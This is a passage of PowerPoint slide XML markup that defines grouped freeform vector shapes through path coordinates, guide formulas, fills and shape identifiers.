                              <a:pt x="0" y="500"/>
                            </a:lnTo>
                            <a:close/>
                          </a:path>
                        </a:pathLst>
                      </a:custGeom>
                      <a:solidFill>
                        <a:srgbClr val="6E6E6E"/>
                      </a:solidFill>
                      <a:ln w="6350" cmpd="sng">
                        <a:solidFill>
                          <a:srgbClr val="545554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2283" name="Group 2013">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C572A382-BB95-4202-8E4F-0D6BC51452F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19" y="1819"/>
                  <a:ext cx="1009" cy="1024"/>
                  <a:chOff x="1319" y="1819"/>
                  <a:chExt cx="1009" cy="1024"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="2284" name="Group 2014">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FB486A0-C263-4DDC-9B05-4A8B7621A6C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190" y="1819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337" name="Freeform 2015">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E783ADDD-26A6-435D-981D-CDB4C1601DF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38" name="Freeform 2016">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BAC9A00-5EB1-478E-925E-30B09EF72E6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39" name="Freeform 2017">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{460BF2E3-2D32-418C-90F3-009ABAE8DF1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285" name="Group 2018">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4C07CFE-7CA4-4355-BAB0-E89E7B162E3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58" y="2159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334" name="Freeform 2019">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A04AF120-548F-4F86-94E1-CC21F97997E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35" name="Freeform 2020">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21E1FC33-BF3A-4168-95AB-A357A2717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36" name="Freeform 2021">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD0C19A-1019-44FF-A8AB-9989249865A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286" name="Group 2022">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C44F29A-EC04-4462-AEF4-1583F098343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972" y="2327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331" name="Freeform 2023">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4F42A25-C04C-40DB-887F-C42D7B6715A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32" name="Freeform 2024">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BE82DD-18B7-4D7E-9882-8A2A688A2B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33" name="Freeform 2025">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4E78B25-05F8-4930-AF27-58470DF11A0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287" name="Group 2026">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA51D78A-7A4F-449B-B2BD-D7DC3B0E000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41" y="2669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328" name="Freeform 2027">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8232555-E6F9-47B5-854D-9271560045F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29" name="Freeform 2028">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E2CE72C-B7D9-46F1-AE1C-4DFB3D945AB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30" name="Freeform 2029">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E06433C5-B095-4A8E-BFEB-E4DC4A38CCD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288" name="Group 2030">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6AF838B-B1D5-402B-8509-FE163089BD6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24" y="2502"/>
                    <a:ext cx="138" cy="173"/>
                    <a:chOff x="2343" y="728"/>
                    <a:chExt cx="569" cy="718"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2325" name="Freeform 2031">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{269DF5C4-DF07-4150-87DE-71D3596CE9A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26" name="Freeform 2032">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7E1BD5E-7EA8-4574-806F-8CDB128CFF4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27" name="Freeform 2033">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8569CF93-B60D-4ABB-A8B7-3EB0769A2CE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289" name="Group 2034">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B25CF1-0155-41E2-B187-0EC6740BD8C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58" y="2390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322" name="Freeform 2035">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3C426D1-049A-4302-9842-727DCAD8FE4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23" name="Freeform 2036">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED9B1C6-AE9D-4ACA-8B0A-CB0EA8200B3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24" name="Freeform 2037">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EB32442-4B0D-4EEE-B7D3-90795E9A92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290" name="Group 2038">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A02B6C97-6BCC-4F63-B04F-B1D0DB96202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972" y="1877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319" name="Freeform 2039">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55640157-8BBA-4061-9641-F18EF8F00B9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20" name="Freeform 2040">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1F36B97-5569-4AAC-8461-F58CFAD3400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21" name="Freeform 2041">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC8A234-030A-462C-A54D-85F4CA91127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291" name="Group 2042">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBCF61AB-280E-41D1-9E7E-6857F2FC899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19" y="2281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316" name="Freeform 2043">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{259B01ED-FD8D-4942-8043-E9DD98C2C3A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17" name="Freeform 2044">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{232ACECB-7C11-4C06-AA67-5A66ABB2BE9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18" name="Freeform 2045">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E871DF-FA39-4416-B7ED-3A3B984BFA8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292" name="Group 2046">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E1569B7-1A87-46AF-A667-5EE46B208CE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42" y="1998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313" name="Freeform 2047">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC3D898B-7F26-4F71-8F17-9F92D775DE6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14" name="Freeform 2048">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366112E7-6777-42A3-8964-60AF2F120A5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15" name="Freeform 2049">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0F7C42D-9A9E-4F1C-AECE-AEAE719E491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293" name="Group 2050">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C878DC6-7C51-401D-877C-2D5EDFCAD98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58" y="1936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310" name="Freeform 2051">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF2B6624-DD72-4DCA-8E3D-8DD320CC80B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11" name="Freeform 2052">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F568199F-49C4-4A80-B937-99B61A35971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12" name="Freeform 2053">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{136C7298-0704-4965-9BCD-C27D7E929AD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294" name="Group 2054">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12C06F03-3A76-4327-B1AB-ABBD75AC33F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24" y="2055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307" name="Freeform 2055">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77395649-A4DB-4FBE-8720-575A56923A5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08" name="Freeform 2056">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D92431E-2CB4-43BA-AC07-12E8D3EACE7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09" name="Freeform 2057">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DDC85B5-5301-46C7-B64D-8F60CAB37AB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295" name="Group 2058">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10D165B5-7020-4E55-AB79-A4B4B089A9E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191" y="2271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304" name="Freeform 2059">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9131B389-2C32-4049-821D-225A0700EFB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05" name="Freeform 2060">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC565510-FF1C-49DD-AF3F-D63FC8A8463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06" name="Freeform 2061">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6B37E52-B58B-4E35-8F07-2854FDAAB08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296" name="Group 2062">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98BCB0C0-A4AC-4A52-A4AF-5665410FCD7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973" y="2554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301" name="Freeform 2063">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCFA298D-D74B-4512-B3B9-F5C00FA5FD4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02" name="Freeform 2064">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACB8CD7D-AE2E-4D33-AF74-A51067F04C1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03" name="Freeform 2065">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE668C47-0379-4C7A-A293-3800EE2F934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297" name="Group 2066">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{101AB4BA-3C28-4F40-83F5-9D1212F6C28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191" y="2499"/>
                    <a:ext cx="137" cy="174"/>
                    <a:chOff x="2343" y="728"/>
                    <a:chExt cx="569" cy="718"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2298" name="Freeform 2067">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7054478-15DB-48AE-825D-41CF28D4D0D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3" y="728"/>
                      <a:ext cx="569" cy="180"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 569"/>
                        <a:gd name="T1" fmla="*/ 112 h 180"/>
                        <a:gd name="T2" fmla="*/ 422 w 569"/>
                        <a:gd name="T3" fmla="*/ 0 h 180"/>
                        <a:gd name="T4" fmla="*/ 569 w 569"/>
                        <a:gd name="T5" fmla="*/ 39 h 180"/>
                        <a:gd name="T6" fmla="*/ 49 w 569"/>
                        <a:gd name="T7" fmla="*/ 180 h 180"/>
                        <a:gd name="T8" fmla="*/ 0 w 569"/>
                        <a:gd name="T9" fmla="*/ 168 h 180"/>
                        <a:gd name="T10" fmla="*/ 0 w 569"/>
                        <a:gd name="T11" fmla="*/ 112 h 1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569" h="180">
                          <a:moveTo>
                            <a:pt x="0" y="112"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="422" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="569" y="39"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="49" y="180"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="168"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="112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299" name="Freeform 2068">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B7FF78-10F2-40C2-A358-D45891202E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92" y="767"/>
                      <a:ext cx="520" cy="679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00" name="Freeform 2069">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{616FFE67-E165-4E96-A0C3-DF8CCD8F54C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2344" y="896"/>
                      <a:ext cx="48" cy="550"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 16"/>
                        <a:gd name="T1" fmla="*/ 0 h 183"/>
                        <a:gd name="T2" fmla="*/ 0 w 16"/>
                        <a:gd name="T3" fmla="*/ 180 h 183"/>
                        <a:gd name="T4" fmla="*/ 16 w 16"/>
                        <a:gd name="T5" fmla="*/ 183 h 183"/>
                        <a:gd name="T6" fmla="*/ 16 w 16"/>
                        <a:gd name="T7" fmla="*/ 3 h 183"/>
                        <a:gd name="T8" fmla="*/ 0 w 16"/>
                        <a:gd name="T9" fmla="*/ 0 h 18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183">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="180"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="16" y="183"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="16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rgbClr val="808080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1682" name="Group 2070">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A02CD8-5A9F-430A-89CE-C5B102D2F1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93832" y="2194042"/>
              <a:ext cx="203252" cy="407800"/>
              <a:chOff x="1823" y="2446"/>
              <a:chExt cx="318" cy="637"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2270" name="Freeform 2071">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A485D5FD-123D-492F-9EBF-4CFBEAEF323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970" y="2758"/>
                <a:ext cx="120" cy="325"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 89 w 90"/>
                  <a:gd name="T1" fmla="*/ 156 h 245"/>
                  <a:gd name="T2" fmla="*/ 89 w 90"/>
                  <a:gd name="T3" fmla="*/ 7 h 245"/>
                  <a:gd name="T4" fmla="*/ 89 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 245"/>
                  <a:gd name="T6" fmla="*/ 63 w 90"/>
                  <a:gd name="T7" fmla="*/ 20 h 245"/>
                  <a:gd name="T8" fmla="*/ 12 w 90"/>
                  <a:gd name="T9" fmla="*/ 10 h 245"/>
                  <a:gd name="T10" fmla="*/ 2 w 90"/>
                  <a:gd name="T11" fmla="*/ 0 h 245"/>
                  <a:gd name="T12" fmla="*/ 3 w 90"/>
                  <a:gd name="T13" fmla="*/ 36 h 245"/>
                  <a:gd name="T14" fmla="*/ 2 w 90"/>
                  <a:gd name="T15" fmla="*/ 205 h 245"/>
                  <a:gd name="T16" fmla="*/ 43 w 90"/>
                  <a:gd name="T17" fmla="*/ 205 h 245"/>
                  <a:gd name="T18" fmla="*/ 45 w 90"/>
                  <a:gd name="T19" fmla="*/ 51 h 245"/>
                  <a:gd name="T20" fmla="*/ 36 w 90"/>
                  <a:gd name="T21" fmla="*/ 40 h 245"/>
                  <a:gd name="T22" fmla="*/ 45 w 90"/>
                  <a:gd name="T23" fmla="*/ 51 h 245"/>
                  <a:gd name="T24" fmla="*/ 43 w 90"/>
                  <a:gd name="T25" fmla="*/ 205 h 245"/>
                  <a:gd name="T26" fmla="*/ 44 w 90"/>
                  <a:gd name="T27" fmla="*/ 211 h 245"/>
                  <a:gd name="T28" fmla="*/ 88 w 90"/>
                  <a:gd name="T29" fmla="*/ 218 h 245"/>
                  <a:gd name="T30" fmla="*/ 89 w 90"/>
                  <a:gd name="T31" fmla="*/ 156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0" h="245">
                    <a:moveTo>
                      <a:pt x="89" y="156"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="141"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="89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  <a:cubicBezTo>
                      <a:pt x="55" y="20"/>
                      <a:pt x="24" y="13"/>
                      <a:pt x="12" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="10"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="2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5"/>
                      <a:pt x="43" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="171"/>
                      <a:pt x="46" y="55"/>
                      <a:pt x="45" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="47"/>
                      <a:pt x="36" y="47"/>
                      <a:pt x="36" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="47"/>
                      <a:pt x="45" y="47"/>
                      <a:pt x="45" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="55"/>
                      <a:pt x="43" y="171"/>
                      <a:pt x="43" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="207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accent1"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="accent1">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1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71" name="Freeform 2072">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{134B76CB-C21B-4D5B-A62E-0126E65CB5C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1828" y="2540"/>
                <a:ext cx="313" cy="258"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 235 w 236"/>
                  <a:gd name="T1" fmla="*/ 114 h 194"/>
                  <a:gd name="T2" fmla="*/ 235 w 236"/>
                  <a:gd name="T3" fmla="*/ 114 h 194"/>
                  <a:gd name="T4" fmla="*/ 225 w 236"/>
                  <a:gd name="T5" fmla="*/ 49 h 194"/>
                  <a:gd name="T6" fmla="*/ 199 w 236"/>
                  <a:gd name="T7" fmla="*/ 24 h 194"/>
                  <a:gd name="T8" fmla="*/ 156 w 236"/>
                  <a:gd name="T9" fmla="*/ 13 h 194"/>
                  <a:gd name="T10" fmla="*/ 116 w 236"/>
                  <a:gd name="T11" fmla="*/ 2 h 194"/>
                  <a:gd name="T12" fmla="*/ 86 w 236"/>
                  <a:gd name="T13" fmla="*/ 12 h 194"/>
                  <a:gd name="T14" fmla="*/ 73 w 236"/>
                  <a:gd name="T15" fmla="*/ 86 h 194"/>
                  <a:gd name="T16" fmla="*/ 73 w 236"/>
                  <a:gd name="T17" fmla="*/ 86 h 194"/>
                  <a:gd name="T18" fmla="*/ 72 w 236"/>
                  <a:gd name="T19" fmla="*/ 91 h 194"/>
                  <a:gd name="T20" fmla="*/ 21 w 236"/>
                  <a:gd name="T21" fmla="*/ 104 h 194"/>
                  <a:gd name="T22" fmla="*/ 26 w 236"/>
                  <a:gd name="T23" fmla="*/ 135 h 194"/>
                  <a:gd name="T24" fmla="*/ 80 w 236"/>
                  <a:gd name="T25" fmla="*/ 122 h 194"/>
                  <a:gd name="T26" fmla="*/ 80 w 236"/>
                  <a:gd name="T27" fmla="*/ 122 h 194"/>
                  <a:gd name="T28" fmla="*/ 86 w 236"/>
                  <a:gd name="T29" fmla="*/ 120 h 194"/>
                  <a:gd name="T30" fmla="*/ 99 w 236"/>
                  <a:gd name="T31" fmla="*/ 112 h 194"/>
                  <a:gd name="T32" fmla="*/ 104 w 236"/>
                  <a:gd name="T33" fmla="*/ 92 h 194"/>
                  <a:gd name="T34" fmla="*/ 104 w 236"/>
                  <a:gd name="T35" fmla="*/ 92 h 194"/>
                  <a:gd name="T36" fmla="*/ 110 w 236"/>
                  <a:gd name="T37" fmla="*/ 47 h 194"/>
                  <a:gd name="T38" fmla="*/ 109 w 236"/>
                  <a:gd name="T39" fmla="*/ 167 h 194"/>
                  <a:gd name="T40" fmla="*/ 118 w 236"/>
                  <a:gd name="T41" fmla="*/ 178 h 194"/>
                  <a:gd name="T42" fmla="*/ 169 w 236"/>
                  <a:gd name="T43" fmla="*/ 192 h 194"/>
                  <a:gd name="T44" fmla="*/ 196 w 236"/>
                  <a:gd name="T45" fmla="*/ 173 h 194"/>
                  <a:gd name="T46" fmla="*/ 196 w 236"/>
                  <a:gd name="T47" fmla="*/ 160 h 194"/>
                  <a:gd name="T48" fmla="*/ 216 w 236"/>
                  <a:gd name="T49" fmla="*/ 155 h 194"/>
                  <a:gd name="T50" fmla="*/ 219 w 236"/>
                  <a:gd name="T51" fmla="*/ 154 h 194"/>
                  <a:gd name="T52" fmla="*/ 232 w 236"/>
                  <a:gd name="T53" fmla="*/ 146 h 194"/>
                  <a:gd name="T54" fmla="*/ 236 w 236"/>
                  <a:gd name="T55" fmla="*/ 124 h 194"/>
                  <a:gd name="T56" fmla="*/ 235 w 236"/>
                  <a:gd name="T57" fmla="*/ 114 h 194"/>
                  <a:gd name="T58" fmla="*/ 192 w 236"/>
                  <a:gd name="T59" fmla="*/ 75 h 194"/>
                  <a:gd name="T60" fmla="*/ 194 w 236"/>
                  <a:gd name="T61" fmla="*/ 88 h 194"/>
                  <a:gd name="T62" fmla="*/ 200 w 236"/>
                  <a:gd name="T63" fmla="*/ 123 h 194"/>
                  <a:gd name="T64" fmla="*/ 196 w 236"/>
                  <a:gd name="T65" fmla="*/ 124 h 194"/>
                  <a:gd name="T66" fmla="*/ 194 w 236"/>
                  <a:gd name="T67" fmla="*/ 88 h 194"/>
                  <a:gd name="T68" fmla="*/ 192 w 236"/>
                  <a:gd name="T69" fmla="*/ 75 h 194"/>
                  <a:gd name="T70" fmla="*/ 192 w 236"/>
                  <a:gd name="T71" fmla="*/ 71 h 194"/>
                  <a:gd name="T72" fmla="*/ 192 w 236"/>
                  <a:gd name="T73" fmla="*/ 75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6" h="194">
                    <a:moveTo>
                      <a:pt x="235" y="114"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="235" y="114"/>
                      <a:pt x="235" y="114"/>
                      <a:pt x="235" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230" y="85"/>
                      <a:pt x="226" y="57"/>
                      <a:pt x="225" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="222" y="32"/>
                      <a:pt x="207" y="27"/>
                      <a:pt x="199" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="191" y="21"/>
                      <a:pt x="169" y="16"/>
                      <a:pt x="156" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="9"/>
                      <a:pt x="125" y="3"/>
                      <a:pt x="116" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="89" y="4"/>
                      <a:pt x="86" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="14"/>
                      <a:pt x="79" y="50"/>
                      <a:pt x="73" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="86"/>
                      <a:pt x="73" y="86"/>
                      <a:pt x="73" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="91"/>
                      <a:pt x="72" y="91"/>
                      <a:pt x="72" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="96"/>
                      <a:pt x="28" y="103"/>
